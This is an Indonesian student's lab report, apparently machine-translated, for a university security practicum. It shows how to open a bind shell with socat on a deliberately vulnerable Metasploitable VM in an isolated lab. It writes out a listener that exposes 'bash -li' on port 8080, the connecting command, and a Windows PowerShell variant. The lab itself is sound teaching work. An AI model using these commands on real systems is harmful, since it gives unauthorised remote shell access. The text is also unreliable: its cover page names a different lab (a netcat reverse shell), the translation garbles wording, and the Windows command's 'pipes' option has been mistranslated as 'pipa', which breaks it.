PRATIKUM KEAMANAN INFRASTRUKTUR JARINGAN KOMPUTER
“Lab 65. Establishing a Reverse Shell with Netcat”
DOSEN PENGAMPU:
HADI KURNIA SAPUTRA, S.Pd, M.Kom
OLEH:
Nama :Mutiah Lubis NIM : 20076011
PROGRAM STUDI PENDIDIKAN TEKNIK INFORMATIKA DEPARTEMEN TEKNIK ELEKTRONIKA
FAKULTAS TEKNIK
UNIVERSITAS NEGERI PADANG
2023
Lab 69. Membuat Bind Shell Menggunakan Socat
Identity
Nama : Mutiah Lubis NIM :20076011
Tujuan Lab:
Pelajari cara menggunakan alat socat untuk mendapatkan shell bind pada target.
Tujuan Lab:
Socat adalah utilitas berbasis baris perintah yang membentuk dua byte dua arah mengalirkan dan mentransfer data di antara mereka. Socat dapat digunakan untuk banyak orang tujuan yang berbeda karena keserbagunaannya.
Alat Lab:
Kali Linux dan Metasploitable VM.
Topologi Lab:
Anda dapat menggunakan Kali Linux di VM untuk lab ini.
Panduan Lab:
Tugas 1:
Di lab ini, kita akan menggunakan socat untuk membuat bind shell pada metasploitable mesin.
Jika Anda tidak terbiasa dengan metasploitable, itu sengaja mesin rentan yang dapat dimuat di VMware, sama seperti Kali Linux. Anda dapat mengunduh file iso metasploitable di sini:
https://docs.rapid7.com/metasploit/metasploitable-2/
Anda dapat menemukan banyak materi di halaman ini tentang cara mengunduh dan mengaturnya VM yang dapat dieksploitasi.
Kami akan menggunakan Kali Linux dan Metasploitable untuk lab ini. Ingatlah untuk letakkan kedua mesin di jaringan khusus host terisolasi yang sama untuk berbicara satu sama lain-lainnya.
Saat login diperlukan, Anda akan memasukkan "msfadmin" sebagai nama pengguna dan kata sandi.
Tugas 2:
Socat sudah diinstal sebelumnya di Kali Linux. Perbedaan utama antara netcat dan socat adalah sintaks untuk menggunakan socat lebih sulit dipahami. Socat digunakan untuk membuat hubungan antara dua titik. Poin-poin ini bisa apa pun. Kita akan mulai dengan membuat bind shell yang menghubungkan Kali VM kita VM Metasploitable kami.
Pertama, mari cari tahu alamat IP eth0 dari VM Metasploitable kami dan tuliskan turun. Kami akan menggunakan informasi ini di Kali VM kami. Buka layar terminal di Metasploitable VM dan ketik perintah ini:
Ifconfig
192.168.56.102 adalah alamat IP dari VM Metasploitable kami dalam kasus ini.
Kemudian, buat pendengar di VM Metasploitable kami dengan mengetik berikut ini:
socat TCP-L:8080 EXEC:”bash -li”
Ini membuat pendengar di VM Metasploitable kami dan setara dengan mengetik "nc -lvnp 8080"
di netcat.
Tugas 3:
Kami kemudian akan beralih ke Kali VM kami dan ketik yang berikut untuk terhubung ke kami VM yang dapat dieksploitasi:
socat TCP:192.168.56.102:8080 -
Jika kami kembali ke terminal Kali kami dan mencoba menjalankan perintah seperti "id" dan
"whoami", kita dapat melihat bahwa kita telah berhasil membuat sebuah shell VM Metasploitable kami.
Ini adalah shell pengikat yang tidak stabil dan tidak interaktif, seperti yang Anda lihat proses seperti SSH tidak berfungsi. Ctrl + c juga akan mematikan shell. Ini adalah sebuah teknik yang berguna untuk diketahui, bagaimanapun, jika netcat tidak berfungsi. Socat juga sangat serbaguna dan lebih mudah untuk menstabilkan cangkangnya, seperti Anda akan melihat di laboratorium nanti.
Jika kami mencoba membuat shell bind menggunakan socat di windows mesin, kita perlu mengubah sintaks pendengar di Windows kita mesin. Sintaks untuk pendengar kami di mesin Windows akan berubah menjadi pengikut:
socat TCP-L:8080 EXEC:powershell.exe,pipa
Perintah ini akan menggunakan Windows Powershell alih-alih bash untuk membuat kerang. Opsi pipa memaksa PowerShell untuk menggunakan input standar gaya Unix dan output, yang memudahkan kita untuk menggunakan shell.